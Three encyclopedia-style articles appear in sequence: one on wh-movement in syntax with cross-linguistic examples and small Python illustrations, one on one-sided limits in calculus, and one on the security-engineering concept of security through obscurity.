The following examples of sentence pairs illustrate wh-movement in main clauses in English: each (a) example has the canonical word order of a declarative sentence in English, while each (b) sentence has undergone wh-movement, whereby the wh-word has been fronted in order to form a direct question.
Wh-fronting of whom, which corresponds to the direct object Tesnière.
Wh-fronting of what, which corresponds to the prepositional object syntax.
Wh-fronting of when, which corresponds to the temporal adjunct tomorrow.
Wh-fronting of what, which corresponds to the predicative adjective happy.
Wh-fronting of where, which corresponds to the prepositional phrase to school.
Wh-fronting of how, which corresponds to the adverb phrase well.
These examples illustrate that wh-movement occurs when aconstituentis questioned that appears to the right of thefinite verbin the corresponding declarative sentence. The main clause remains inV2 word order, with the interrogative fronted to first position while the finite verb stays in second position.Do-supportis often needed to enable wh-fronting in such cases, which are reliant onsubject–auxiliary inversion.
When the subject is questioned, it is unclear whether wh-fronting has occurred, because the default position of the subject is clause-initial. In the example sentence pair below, the subject Fred already appears at the front of the sentence, where the interrogative is placed.
Some theories of syntax maintain that this constitutes a wh-movement, and analyze such cases as if the interrogative subject has moved up the syntactic hierarchy; however, other theories observe that the surface string of words remains the same, and therefore, no movement has occurred.[3]
In many cases, wh-fronting can occur regardless of how far away its canonical location is, as seen in the following set of examples:
The interrogative whom is the direct object of the verb like in each of these examples. The dependency relation between the canonical, empty position and the wh-expression appears to be unbounded, in the sense that there is no upper bound on how deeply embedded within the given sentence the empty position may appear.
Wh-movement typically occurs when forming questions in English. There are certain forms of questions in which wh-movement does not occur (aside from when the question word serves as the subject and so is already fronted):
Other languages may leave wh-expressions in-situ (in base position) more often, such as the Slavic languages.[5] In French, for instance, wh-movement is often optional in certain matrix clauses.[6] Mandarin and Russian also possess wh-expressions without obligatory wh-movement.
In-situ questions differ from wh-fronted questions in that they involve no movement at all; whether a wh-expression stays in-situ tends to be morphologically or pragmatically conditioned.[4]
The basic examples above demonstrate wh-movement in main clauses in order to form a direct question. Wh-movement can also occur in subordinate clauses, although its behavior in subordinate clauses differs in word order.
In English, wh-movement occurs in subordinate clauses to form an indirect question. While wh-fronting occurs in both direct and indirect questions, there is a key word order difference,[7]as illustrated with the following examples:
In indirect questions, while the interrogative is still fronted to the first position of the clause, the subject is instead placed in second position, and the verb appears in third position, forming a V3 word order.
Although many examples of wh-movement form questions, wh-movement also occurs in relative clauses.[8] Many relative pronouns in English have the same form as the corresponding interrogative words (which, who, where, etc.). Relative clauses are subordinate clauses, so the same V3 word order occurs.
The relative pronouns have fronted in the subordinate clauses of the b. examples. The characteristic V3 word order is obligatory, just as in other subordinate clauses.
Many instances of wh-fronting involve pied-piping, where the word that is moved pulls an entire encompassing phrase to the front of the clause with it. Pied-piping was first identified by John R. Ross in his 1967 dissertation.[9]
In some cases of wh-fronting, pied-piping is obligatory, and the entire encompassing phrase must be fronted for the sentence to be grammatically correct. In the following examples, the moved phrase is underlined:
These examples illustrate that pied-piping is often necessary when the wh-word is inside a noun phrase or adjective phrase. Pied-piping is motivated in part by the barriers and islands to extraction (see below). When the wh-word appears underneath a blocking category or in an island, the entire encompassing phrase must be fronted.
There are other cases where pied-piping is optional. In English, this occurs most notably when the fronted word is the object of a prepositional phrase. A formal register will pied-pipe the preposition, whereas more colloquial English prefers to leave the preposition in situ:
The c. examples are cases of preposition stranding, which is possible in colloquial English but not allowed in many languages related to English.[10] For instance, preposition stranding is largely absent from many of the other Germanic languages, and it may be completely absent from the Romance languages. Prescriptive grammars often claim that preposition stranding should be avoided in English as well, although moving the preposition may feel artificial or stilted to a native speaker.
A syntactic island is a construction from which extracting an element leads to an ungrammatical or marginal sentence. For example:
These types of phrases, also referred to as extraction islands or simply islands, do not allow wh-movement to occur.[12] John R. Ross proposed and described four types of islands:[13] the Complex Noun Phrase Constraint (CNPC),[14][15] the Coordinate Structure Constraint (CSC), the Left Branch Condition, and the Sentential Subject Constraint.[16] Configurations showing clear island restrictions have also been called wh-islands, complex noun phrases, and adjunct islands.[17]
An adjunct island is a type of island formed from an adjunct clause. Wh-movement is not possible from an adjunct clause. Adjunct clauses include clauses introduced by because, if, and when, as well as relative clauses. Instead, a question would be formed by keeping the interrogative in situ. For example:
A wh-island is created by an embedded sentence that is introduced by a wh-word, creating a dependent clause. Wh-islands are weaker than adjunct islands: violating them results in a sentence that sounds at least marginal to a native speaker.
The b. sentences are strongly marginal or unacceptable because they attempt to extract an expression out of a wh-island. The embedded Spec-C position is already occupied by a wh-word, and because wh-movement is a cyclic process that must pass through Spec-C, the lower wh-word cannot skip the occupied position to reach the top of the structure; the two wh-words interfere with each other, and no grammatical result is possible.
Although wh-extraction out of object clauses and phrases is common in English, wh-movement is not (or rarely) possible out of subject phrases, particularly subject clauses.[18]For example:
A left branch island occurs where a modifier precedes the noun that it modifies. The modifier cannot be extracted, a constraint which Ross identified as the Left Branch Condition.[19] Possessive determiners and attributive adjectives form left branch islands. Fronting of these phrases necessitates pied-piping of the entire noun phrase, for example:
Extraction fails in the b. sentences because the extracted expression corresponds to a left-branch modifier of a noun.
While left branch islands exist in English, they are absent from many other languages, most notably from the Slavic languages.[20]
In coordination, extraction out of a conjunct of a coordinate structure is possible only if the extraction affects all the conjuncts of the coordinate structure equally. The relevant constraint is known as the coordinate structure constraint.[21] Extraction must extract the same syntactic expression out of each of the conjuncts simultaneously. This sort of extraction is said to occur across the board (ATB-extraction),[22] e.g.,
Wh-extraction out of a conjunct of a coordinate structure is possible only if it can be interpreted as occurring equally out of all the conjuncts simultaneously, that is, if it occurs across the board.
Extraction out of a noun phrase is difficult. The relevant constraint is known as the complex NP constraint,[23] and it comes in two varieties: the first bans extraction from the clausal complement of a noun, and the second bans extraction from a relative clause modifying a noun:
Sentential complement to a noun:
Relative clause:
Extraction out of object that-clauses serving as complements to verbs may show island-like behavior if the matrix verb is a nonbridge verb (Erteschik-Shir 1973). Nonbridge verbs include manner-of-speaking verbs, such as whisper or shout, e.g.,
Syntax trees are visual breakdowns of sentences that include dominating heads for every segment (word/constituent) in the tree. In wh-movement, additional features are added: the EPP (extended projection principle) feature and the question feature [+Q], which marks a question sentence.
Wh-movement is motivated by a question feature/EPP at C (complementizer), which promotes movement of a wh-word from its canonical base position to Spec-C. This movement can be thought of as "Copy + Paste + Delete": the interrogative word is copied from the bottom, pasted into Spec-C, and then deleted from the bottom so that it remains only at the top (now occupying Spec-C). Overall, the highest C is the target position of the wh-raising.[2]
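As a rough illustration of this "Copy + Paste + Delete" operation, the sketch below models a clause as a flat list of tokens and fronts the first wh-word it finds. The list encoding and the helper name wh_front are simplifications assumed here for illustration, not part of any syntactic formalism.

```python
# Minimal sketch (assumed simplification, not a real parser):
# wh-movement as "Copy + Paste + Delete" over a flat token list.

WH_WORDS = {"who", "whom", "what", "where", "when", "why", "how"}

def wh_front(tokens):
    """Front the first wh-word: copy it to clause-initial position
    (standing in for Spec-C) and delete it from its base position."""
    for i, tok in enumerate(tokens):
        if tok.lower() in WH_WORDS:
            copied = tokens[i]                     # Copy
            remainder = tokens[:i] + tokens[i+1:]  # Delete from base position
            return [copied] + remainder            # Paste at the front
    return list(tokens)  # no wh-word: nothing moves (wh-in-situ)

# "you are thinking about whom" -> "whom you are thinking about"
print(wh_front(["you", "are", "thinking", "about", "whom"]))
```

A clause without a wh-word passes through unchanged, mirroring the fact that movement is triggered only when the [+Q]/EPP features have a wh-candidate to attract.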
The interrogatives that are used in the wh-movement do not all share headedness. This is important to consider when making the syntax trees, as there are three different heads that may be used.
Determiner Phrase (DP): Who, What
Prepositional Phrase (PP): Where, When, Why
Adverb Phrase (AdvP): How
When drawing a syntax tree for wh-movement, account for subject–auxiliary inversion: the auxiliary raises from T (tense) to C (complementizer).
The location of the EPP (Extended Projection Principle):
The EPP allows movement of the wh-word from its canonical position at the bottom of the syntax tree to Spec-C. The EPP is a good indicator for distinguishing between in-situ and ex-situ trees: ex-situ trees allow movement to Spec-C, while in-situ trees do not, as the head C lacks the EPP feature.
Within syntax trees, islands do not allow movement to occur; if movement is attempted, the sentence is perceived as ungrammatical by native speakers of the language in question. Islands are typically noted as a boxed node on the tree. Movement in the wh-island syntax tree cannot occur because, in order to move out of an embedded clause, a determiner phrase (DP) must move through the Spec-C position, and that position is already occupied.
For example, in "She said [who bought what]?" we see that "who" occupies the embedded Spec-C and blocks "what" from rising to it. Native speakers confirm this, since the result of the attempted extraction sounds ungrammatical: * "What did she say [who bought]?"
In some languages, a sentence can contain more than one wh-question. These interrogative constructions are called multiple wh-questions,[24] e.g.: Who ate what at the restaurant?
In the following English example, a strikeout line and trace-movement coindexation symbols, as in [Whoi ... whoti ...], are used to indicate the underlying raising movement of the closest wh-phrase. This movement produces an overt sentence word order with one fronted wh-question:
e.g.: [Whoi did you help whoti make what?]
In the underlying syntax, the wh-phrase closest to Spec-CP is raised to satisfy selectional properties of the CP: the [+Q] and [+Wh-EPP] feature requirements of C. The wh-phrase farther away from Spec-CP stays in its base position (in-situ).[24]
Thesuperiority conditiondetermines which wh-phrase moves in a clause that contains multiple wh-phrases.[24]This is the outcome of applying theAttract Closestprinciple, where only the closest candidate is eligible for movement to the attractingheadthat selects for it.[24]If the farther wh-phrase moves instead of the preceding wh-phrase, an ungrammatical structure is created (in English). Not all languages have instances of multiple wh-movement governed by the superiority condition, most have variations. There is no uniformity found across languages concerning the superiority condition.
For example, see the following English phrases:
The subscripts "ti" and "i" mark coreference: "t" represents a trace, and matching indices indicate that the marked elements refer to the same entity.
In a., the closer wh-phrase [who] moves up toward Spec-CP from being the subject of the VP [who to buy what]. The second wh-phrase [what] remains in-situ (as the direct object of the VP [who to buy what]). This satisfies the [+Q Wh] feature in the Spec-CP.
In b., the farther wh-phrase [what] has incorrectly moved from the direct object position of the VP [who to buy what] into the Spec-CP position, while the wh-phrase closer to Spec-CP [who] has remained in-situ as the subject of the VP [who to buy what]. Thus, this sentence violates Attract Closest and is therefore ungrammatical, as marked by the asterisk (*).
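The Attract Closest effect described above can be sketched in the same flat-list style; the encoding and the helper name attract_closest are assumptions made here for illustration only.

```python
# Sketch (assumed simplification): with several wh-phrases in a clause,
# only the one closest to Spec-CP (earliest in base order) may front;
# the others remain in-situ, mirroring the superiority condition.

WH_WORDS = {"who", "whom", "what", "where", "when", "why", "how"}

def attract_closest(tokens):
    """Front only the closest wh-phrase; leave the rest in-situ."""
    positions = [i for i, t in enumerate(tokens) if t.lower() in WH_WORDS]
    if not positions:
        return list(tokens)
    i = positions[0]  # the closest candidate wins
    return [tokens[i]] + tokens[:i] + tokens[i+1:]

# Base order "you helped who buy what": "who" fronts, "what" stays in-situ
print(attract_closest(["you", "helped", "who", "buy", "what"]))
```

Fronting any wh-phrase other than positions[0] would model the ungrammatical b.-type sentences, which skip the closest candidate.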
Wh-movement is also found in many other languages around the world. Most European languages also place wh-words at the beginning of a clause. Furthermore, many of the facts illustrated above are also valid for other languages. The systematic difference in word order across main wh-clauses and subordinate wh-clauses shows up in other languages in varying forms. The islands to wh-extraction are also present in other languages, but there will be some variation. The following example illustrates wh-movement of an object in Spanish:
Juan compró carne.
John bought meat.
'John bought meat.'

¿Qué compró Juan?
what bought John
'What did John buy?'
The following examples illustrate wh-movement of an object in German:
Er liest Tesnière jeden Abend.
He reads Tesnière every evening.
'He reads Tesnière every evening.'

Wen liest er jeden Abend?
who reads he every evening
'Who does he read every evening?'
The following examples illustrate wh-movement of an object in French:
Ils ont vu Pierre.
they have seen Peter
'They saw Peter.'

Qui est-ce qu'ils ont vu?
who is-it-that they have seen
'Who did they see?'

Qui ont-ils vu?
who have they seen
'Who did they see?'
All the examples are quite similar to the English examples and demonstrate that wh-movement is a general phenomenon in numerous languages. As stated, however, the behaviour of wh-movement can vary, depending on the individual language in question.
German does not show the expected effects of the superiority condition in clauses with multiple wh-phrases. German appears to have a process that allows the farther wh-phrase to "cross over" the closer wh-phrase and move rather than remain in-situ.[25] This movement is tolerated and has fewer consequences than in English.[25]
For example, see the following German phrases:
Ich weiß nicht, wer was gesehen hat.
I know not who what seen has
'I do not know who saw what.'

Ich weiß nicht, was wer gesehen hat.
I know not what who seen has
'I do not know what who has seen.'
In b., the gloss shows that the wh-phrase [was] ('what') has "crossed over" the wh-phrase [wer] ('who') and is now in Spec-CP to satisfy the [+Q Wh] feature. This movement violates the Attract Closest principle, on which the superiority condition is based.
Mandarin is a wh-in-situ language, which means that it does not exhibit wh-movement in constituent questions.[26] In other words, wh-words in Mandarin remain in their original position in their clause, in contrast with English, where the wh-word moves in constituent questions.
The following example illustrates a multiple wh-question in Mandarin:
你想知道瑪麗為什麼買了什麼
nǐ xiǎng zhīdào Mǎlì wèishénme mǎile shénme
you want know Mary why buy-PAST what
'What do you wonder why Mary bought?'
This example demonstrates that the wh-word for "what" in Mandarin remains in-situ at surface structure,[27] while the wh-word for "why" moves to its proper scope position and, in doing so, c-commands the wh-word that stays in-situ.
The scope of wh-questions in Mandarin is also subject to other conditions depending on the kind of wh-phrase involved.[28]The following example can translate into two meanings:
你想知道誰買了什麼
nǐ xiǎng zhīdào shéi mǎile shénme
you want know who buy-PAST what
'What is the thing x such that you wonder who bought x?'
'Who is the person x such that you wonder what x bought?'
This example illustrates the way certain wh-words such as "who" and "what" can freely obtain matrix scope in Mandarin.[29]
In reference to the Attract Closest principle, where the head adopts the closest candidate available to it, the overt wh-phrase in Mandarin moves to its proper scope position while the other wh-phrase stays in-situ, as it is c-commanded by the first wh-phrase.[30] This can be seen in the following example, where the word for "what" stays in-situ since it is c-commanded by the phrase meaning "at where":
你想知道瑪麗在哪裡買了什麼
nǐ xiǎng zhīdào Mǎlì zài nǎlǐ mǎile shénme
you want know Mary at where buy-PAST what
'What is the thing x such that you wonder where Mary bought x?'
'Where is the place x such that you wonder what Mary bought at x?'
As these examples show, Mandarin is a wh-in-situ language: it exhibits no movement of wh-phrases at surface structure, is subject to further conditions based on the type of wh-phrase involved in the question, and adheres to the Attract Closest principle.
In Bulgarian, the [+wh] feature of C motivates movement of multiple wh-words, which leads to multiple specifiers. It requires the formation of a cluster of wh-phrases in [Spec-CP] in the matrix clause. This differs from English, where only one wh-word moves to [Spec-CP] when there are multiple wh-words in a clause. In Bulgarian, unlike English, all movements of wh-elements take place in the syntax, where movement is shown overtly.[31] The phrase structure for wh-words in Bulgarian is shown in Figure 1 below, where a wh-cluster is formed under [Spec-CP].
In Bulgarian and Romanian, one wh-element is attracted into [Spec-CP] and the other wh-elements are adjoined to the first wh-word in [Spec-CP].[32]
Koj kogo ___t1 vižda ___t2?
who whom {} sees {}
'Who sees whom?'
In Example 1, we see that both the wh-words underwent movement and are in a [Spec-CP] cluster.
Attract Closest is the principle underlying the Superiority Condition: the head that attracts a certain feature adopts the closest candidate available to it, which usually leads to the movement of that closest candidate.
Slavic languages are grouped into two different S-structures concerning the movement of wh-elements to [Spec-CP] (Rudin, 1998). One group includes Serbo-Croatian, Polish, and Czech, where there is only one wh-element in [Spec-CP] at S-structure. The other group contains Bulgarian, which has all of its wh-elements in [Spec-CP] at S-structure. In the first group, the Attract Closest principle is present, and the wh-word closest to the attracting head undergoes movement while the rest of the wh-elements remain in-situ. In the second group, the Attract Closest principle applies in a slightly different way: the order in which the wh-words move is dictated by their proximity to [Spec-CP]. The wh-word closest to the attracting head undergoes movement first, the next closest follows, and so on. In this way, the superiority effect is present in Serbo-Croatian, Polish, and Czech in the first wh-element, while in Bulgarian it is present in all of the wh-elements in the clause.[33]
Kakvo kak napravi Ivan?
what how did Ivan
'What did Ivan do how?'
The Attract Closest principle explains a crucial detail about which wh-words move first in the tree. Since the closest wh-word is moved first, a particular order appears: wh-subjects go before wh-objects and wh-adjuncts (Grewendorf, 2001). This is seen in Examples #2 and #3. Example #3 also shows that there can be more than two wh-words in [Spec-CP] and that, no matter how many wh-words are in the clause, they all have to undergo movement.
Koj kak kogo e celunal?
who how whom is kissed
'Who kissed whom how?'
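The ordered clustering of wh-words in [Spec-CP] can be sketched as a simple transformation; the flat-list encoding, the token inventory, and the assumed base order are simplifications introduced here for illustration.

```python
# Sketch (assumed simplification): Bulgarian-style multiple wh-fronting.
# Every wh-phrase moves into a [Spec-CP] cluster, and the cluster order
# reflects proximity: the closest wh-word fronts first, then the next.

WH_WORDS = {"koj", "kogo", "kak", "kakvo"}

def multiple_wh_front(tokens):
    """Move all wh-words to an initial cluster, preserving their
    relative order (closest first), and leave the remnant clause after."""
    cluster = [t for t in tokens if t.lower() in WH_WORDS]
    remnant = [t for t in tokens if t.lower() not in WH_WORDS]
    return cluster + remnant

# An assumed base order yields the attested surface order
# "Koj kak kogo e celunal" ('Who kissed whom how?').
print(multiple_wh_front(["koj", "e", "kak", "celunal", "kogo"]))
```

Because the list comprehension preserves relative order, the cluster comes out sorted by proximity to [Spec-CP], matching the subject > adjunct > object ordering in the example above.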
In Bulgarian, Example #4 shows that, to avoid forming a sequence of identical wh-words, a wh-element is allowed to remain in-situ as a last resort (Bošković, 2002).
Kakvo obuslavja kakvo?
what conditions what
'What conditions what?'
In summary, Bulgarian has multiple wh-movement in the syntax, and the wh-words move overtly. We also see that while all wh-words in a clause move to [Spec-CP] because of the [+wh] feature, there is still a certain order in how they appear in the clause.
In French, multiple wh-questions have the following patterns:
a) In some French interrogative sentences, wh-movement can be optional.[34]
1. The closest wh-phrase to Spec-CP can be fronted (i.e., moved to Spec-CP from its covert base position in deep structure to its overt phonological form in surface-structure word order);
2. Alternatively, wh-phrases can remain in-situ.[34][35]
Qu'as-tu envoyé à qui?
what have-you sent to whom
'What have you sent to who(m)?'

Tu as envoyé quoi à qui?
you have sent what to whom
'What have you sent to who(m)?'
In the example sentences above, #1 and #2 are both grammatical and share the same meaning in French. Here, the choice of one form of question over the other is optional; either sentence can be used to ask about the two particular DP constituents expressed by the two wh-words.[34] In French, the second sentence could also be used as an echo question.[36] By contrast, in English, the grammatical structure of the second sentence is only acceptable as an echo question: a question we ask to clarify the information we hear (or mishear) in someone's utterance, or to express our shock or disbelief in reaction to a statement made by someone.[25] For echo questions in English, it is typical for speakers to emphasize the wh-words prosodically by using rising intonation (e.g., You sent WHAT to WHO?). These special instances of using multiple wh-questions in English are essentially "requests for the repetition of that utterance".[25]
b) In other French interrogative sentences, wh-movement is required.[35]
The option of using wh-in-situ in French sentences with multiple wh-questions is limited to specific conditions. There exists "a very limited distribution" of its usage.[35]
French wh-in-situ can occur only:
Wh-in-situ usage is not allowed in French when these criteria are not met.[35]
Many languages do not have wh-movement. Instead, these languages keep the symmetry of the question and answer sentences.
For example, topic questions in Chinese have the same sentence structure as their answers:
你在做什麼?
nǐ zài zuò shénme
you PROG do what
'What are you doing?'
The response to which could be:
我在編輯維基百科。
wǒ zài biānjí Wéijībǎikē
I PROG edit Wikipedia
'I am editing Wikipedia.'
Chinese thus uses question particles and wh-in-situ rather than wh-movement.
Wh-movement typically results in a discontinuity: the "moved" constituent ends up in a position that is separated from its canonical position by material that syntactically dominates the canonical position, which means there seems to be a discontinuous constituent and a long-distance dependency present. Such discontinuities challenge any theory of syntax, and any theory of syntax must have a component that can address them. In this regard, theories of syntax tend to explain discontinuities in one of two ways: via movement or via feature passing. The EPP (extended projection principle) feature and the question feature play a large role in the movement itself; these two features occur in ex-situ questions, which allow movement, and are absent from in-situ questions, which do not allow it.
Theories that posit movement have a long and established tradition that reaches back to early generative grammar (1960s and 1970s). They assume that the displaced constituent (e.g., the wh-expression) is first generated in its canonical position at some level or point in the structure-generating process below the surface. This expression is then moved or copied out of this base position and placed in its surface position, where it actually appears in speech.[37] Movement is indicated in tree structures using one of a variety of means (e.g., a trace t, movement arrows, strikeouts, lighter font shade, etc.).
The alternative to the movement approach to wh-movement and discontinuities in general is feature passing. This approach rejects the notion that movement in any sense has occurred. The wh-expression is base generated in its surface position, and instead of movement, information passing (i.e., feature passing) occurs up or down the syntactic hierarchy to and from the position of the gap.
Source: https://en.wikipedia.org/wiki/Wh-movement
In calculus, a one-sided limit refers to either of the two limits of a function f(x) of a real variable x as x approaches a specified point either from the left or from the right.[1][2]
The limit as x decreases in value approaching a (x approaches a "from the right"[3] or "from above") can be denoted:[1][2]
{\displaystyle \lim _{x\to a^{+}}f(x)\quad {\text{ or }}\quad \lim _{x\,\downarrow \,a}\,f(x)\quad {\text{ or }}\quad \lim _{x\searrow a}\,f(x)\quad {\text{ or }}\quad f(x+)}
The limit as x increases in value approaching a (x approaches a "from the left"[4][5] or "from below") can be denoted:[1][2]
{\displaystyle \lim _{x\to a^{-}}f(x)\quad {\text{ or }}\quad \lim _{x\,\uparrow \,a}\,f(x)\quad {\text{ or }}\quad \lim _{x\nearrow a}\,f(x)\quad {\text{ or }}\quad f(x-)}
If the limit of f(x) as x approaches a exists, then the limits from the left and from the right both exist and are equal. In some cases in which the limit {\displaystyle \lim _{x\to a}f(x)} does not exist, the two one-sided limits nonetheless exist. For this reason, the limit as x approaches a is sometimes called a "two-sided limit".
It is possible for exactly one of the two one-sided limits to exist (while the other does not exist). It is also possible for neither of the two one-sided limits to exist.
If I represents some interval that is contained in the domain of f and if a is a point in I, then the right-sided limit as x approaches a can be rigorously defined as the value R that satisfies:[6]
{\displaystyle {\text{for all }}\varepsilon >0\;{\text{ there exists some }}\delta >0\;{\text{ such that for all }}x\in I,{\text{ if }}\;0<x-a<\delta {\text{ then }}|f(x)-R|<\varepsilon ,}
and the left-sided limit as x approaches a can be rigorously defined as the value L that satisfies:
{\displaystyle {\text{for all }}\varepsilon >0\;{\text{ there exists some }}\delta >0\;{\text{ such that for all }}x\in I,{\text{ if }}\;0<a-x<\delta {\text{ then }}|f(x)-L|<\varepsilon .}
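The right-sided clause of this definition can be illustrated numerically. The sketch below samples points in the one-sided δ-window for f(x) = √x at a = 0, an example chosen here (not taken from the source), where R = 0 and δ = ε² suffices; it is a spot check on sampled points, not a proof.

```python
# Numerical illustration (not a proof) of the right-sided definition:
# check |f(x) - R| < eps for sampled x satisfying 0 < x - a < delta.
import math

def satisfies_right_limit(f, a, R, eps, delta, samples=1000):
    for k in range(1, samples + 1):
        x = a + delta * k / (samples + 1)   # ensures 0 < x - a < delta
        if abs(f(x) - R) >= eps:
            return False
    return True

# For f(x) = sqrt(x) at a = 0 with R = 0, delta = eps**2 works:
# 0 < x < eps**2 implies sqrt(x) < eps.
eps = 1e-3
print(satisfies_right_limit(math.sqrt, 0.0, 0.0, eps, eps**2))  # True
```

Passing with a particular δ only shows that that δ works for that ε on the sampled points; the definition requires such a δ to exist for every ε > 0.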
We can represent the same thing more symbolically, as follows.
Let I represent an interval, where I ⊆ domain(f), and a ∈ I.
In comparison to the formal definition for the limit of a function at a point, the one-sided limit (as the name would suggest) only deals with input values to one side of the approached input value.
For reference, the formal definition for the limit of a function at a point is as follows: the limit of f(x) as x approaches a is L if, for all ε > 0, there exists some δ > 0 such that for all x ∈ I, if 0 < |x − a| < δ, then |f(x) − L| < ε.
To define a one-sided limit, we must modify this inequality. Note that the absolute distance between x and a is
{\displaystyle |x-a|=|(-1)(-x+a)|=|(-1)(a-x)|=|(-1)||a-x|=|a-x|.}
For the limit from the right, we want x to be to the right of a, which means that a < x, so x − a is positive. From above, x − a is the distance between x and a. We want to bound this distance by our value of δ, giving the inequality x − a < δ. Putting together the inequalities 0 < x − a and x − a < δ and using the transitivity property of inequalities, we have the compound inequality 0 < x − a < δ.
Similarly, for the limit from the left, we want x to be to the left of a, which means that x < a. In this case, it is a − x that is positive and represents the distance between x and a. Again, we want to bound this distance by our value of δ, leading to the compound inequality 0 < a − x < δ.
Now, when our value of x is in its desired interval, we expect that the value of f(x) is also within its desired interval. The distance between f(x) and L, the limiting value of the left-sided limit, is |f(x) − L|. Similarly, the distance between f(x) and R, the limiting value of the right-sided limit, is |f(x) − R|. In both cases, we want to bound this distance by ε, so we get the following: |f(x) − L| < ε for the left-sided limit, and |f(x) − R| < ε for the right-sided limit.
Example 1:
The limits from the left and from the right of g(x) := −1/x as x approaches a := 0 are
{\displaystyle \lim _{x\to 0^{-}}{-1/x}=+\infty \qquad {\text{ and }}\qquad \lim _{x\to 0^{+}}{-1/x}=-\infty }
The reason the limit from the left is +∞ is that x is always negative (since x → 0⁻ means that x → 0 with all values of x satisfying x < 0), which implies that −1/x is always positive, so that −1/x diverges[note 1] to +∞ (and not to −∞) as x approaches 0 from the left.
Similarly, the limit from the right is −∞, since all values of x satisfy x > 0 (said differently, x is always positive) as x approaches 0 from the right, which implies that −1/x is always negative, so that −1/x diverges to −∞.
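A quick numerical sketch of this behavior, sampling g(x) = −1/x on either side of 0 (the sample points are chosen here for illustration):

```python
# Sketch: sampling g(x) = -1/x near 0 shows the two one-sided behaviors:
# values grow without bound from the left and decrease without bound
# from the right, matching the limits stated above.

def g(x):
    return -1.0 / x

left = [g(x) for x in (-1e-2, -1e-4, -1e-6)]   # increasingly large positive
right = [g(x) for x in (1e-2, 1e-4, 1e-6)]     # increasingly large negative
print(left)
print(right)
```

No finite sample proves divergence, but each step closer to 0 makes |g(x)| larger, as the sign analysis above predicts.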
Example 2:
One example of a function with different one-sided limits is f(x) = 1/(1 + 2^(−1/x)) (cf. picture), where the limit from the left is lim_{x→0⁻} f(x) = 0 and the limit from the right is lim_{x→0⁺} f(x) = 1. To calculate these limits, first show that

lim_{x→0⁻} 2^(−1/x) = ∞  and  lim_{x→0⁺} 2^(−1/x) = 0

(which is true because lim_{x→0⁻} −1/x = +∞ and lim_{x→0⁺} −1/x = −∞), so that consequently

lim_{x→0⁺} 1/(1 + 2^(−1/x)) = 1/(1 + lim_{x→0⁺} 2^(−1/x)) = 1/(1 + 0) = 1,

whereas lim_{x→0⁻} 1/(1 + 2^(−1/x)) = 0, because the denominator diverges to infinity; that is, because lim_{x→0⁻} (1 + 2^(−1/x)) = ∞. Since lim_{x→0⁻} f(x) ≠ lim_{x→0⁺} f(x), the limit lim_{x→0} f(x) does not exist.
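As a quick numerical illustration (not from the article), one can evaluate f(x) = 1/(1 + 2^(−1/x)) at points approaching 0 from each side and watch the values settle toward the two different one-sided limits:

```python
# Numerically approach 0 from each side for f(x) = 1 / (1 + 2**(-1/x)).
# (Illustrative check, not part of the original article.)

def f(x):
    return 1.0 / (1.0 + 2.0 ** (-1.0 / x))

# From the left (x < 0): values shrink toward 0.
left = [f(-10.0 ** -k) for k in range(1, 4)]
# From the right (x > 0): values approach 1.
right = [f(10.0 ** -k) for k in range(1, 4)]

print(left)
print(right)
```

The exponents stay small enough here to avoid float overflow in 2^(−1/x); closer to 0 from the left, the denominator exceeds the float range.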
The one-sided limit at a point p corresponds to the general definition of limit, with the domain of the function restricted to one side, either by allowing that the function domain is a subset of the topological space or by considering a one-sided subspace including p.[1] Alternatively, one may consider the domain with a half-open interval topology.
A noteworthy theorem treating one-sided limits of certain power series at the boundaries of their intervals of convergence is Abel's theorem.
|
https://en.wikipedia.org/wiki/One-sided_limit
|
In security engineering, security through obscurity is the practice of concealing the details or mechanisms of a system to enhance its security. This approach relies on the principle of hiding something in plain sight, akin to a magician's sleight of hand or the use of camouflage. It diverges from traditional security methods, such as physical locks, and is more about obscuring information or characteristics to deter potential threats. Examples of this practice include disguising sensitive information within commonplace items, like a piece of paper in a book, or altering digital footprints, such as spoofing a web browser's version number. While not a standalone solution, security through obscurity can complement other security measures in certain scenarios.[1]
Obscurity in the context of security engineering is the notion that information can be protected, to a certain extent, when it is difficult to access or comprehend. This concept hinges on the principle of making the details or workings of a system less visible or understandable, thereby reducing the likelihood of unauthorized access or manipulation.[2]
Security by obscurity alone is discouraged and not recommended by standards bodies.
An early opponent of security through obscurity was the locksmith Alfred Charles Hobbs, who in 1851 demonstrated to the public how state-of-the-art locks could be picked. In response to concerns that exposing security flaws in the design of locks could make them more vulnerable to criminals, he said: "Rogues are very keen in their profession, and know already much more than we can teach them."[3]
There is scant formal literature on the issue of security through obscurity. Books on security engineering cite Kerckhoffs' doctrine from 1883, if they cite anything at all. For example, in a discussion about secrecy and openness in nuclear command and control:
[T]he benefits of reducing the likelihood of an accidental war were considered to outweigh the possible benefits of secrecy. This is a modern reincarnation of Kerckhoffs' doctrine, first put forward in the nineteenth century, that the security of a system should depend on its key, not on its design remaining obscure.[4]
Peter Swire has written about the trade-off between the notion that "security through obscurity is an illusion" and the military notion that "loose lips sink ships",[5] as well as on how competition affects the incentives to disclose.[6]
There are conflicting stories about the origin of this term. Fans of MIT's Incompatible Timesharing System (ITS) say it was coined in opposition to Multics users down the hall, for whom security was far more of an issue than on ITS. Within the ITS culture, the term referred, self-mockingly, to the poor coverage of the documentation and obscurity of many commands, and to the attitude that by the time a tourist figured out how to make trouble he'd generally got over the urge to make it, because he felt part of the community. One instance of deliberate security through obscurity on ITS has been noted: the command to allow patching the running ITS system (altmode altmode control-R) echoed as $$^D. Typing Alt Alt Control-D set a flag that would prevent patching the system even if the user later got it right.[7]
In January 2020, NPR reported that Democratic Party officials in Iowa declined to share information regarding the security of its caucus app, to "make sure we are not relaying information that could be used against us." Cybersecurity experts replied that "to withhold the technical details of its app doesn't do much to protect the system."[8]
The National Institute of Standards and Technology (NIST) in the United States recommends against this practice: "System security should not depend on the secrecy of the implementation or its components."[9] The Common Weakness Enumeration project lists "Reliance on Security Through Obscurity" as CWE-656.[10]
A large number of telecommunication and digital rights management cryptosystems use security through obscurity, but have ultimately been broken. These include components of GSM, GMR encryption, GPRS encryption, a number of RFID encryption schemes, and most recently Terrestrial Trunked Radio (TETRA).[11]
One of the largest proponents of security through obscurity commonly seen today is anti-malware software. What typically occurs with this single point of failure, however, is an arms race of attackers finding novel ways to avoid detection and defenders coming up with increasingly contrived but secret signatures to flag on.[12]
The technique stands in contrast with security by design and open security, although many real-world projects include elements of all strategies.
Knowledge of how the system is built differs from concealment and camouflage. The effectiveness of obscurity in operations security depends on whether the obscurity lives on top of other good security practices, or if it is being used alone.[13] When used as an independent layer, obscurity is considered a valid security tool.[14]
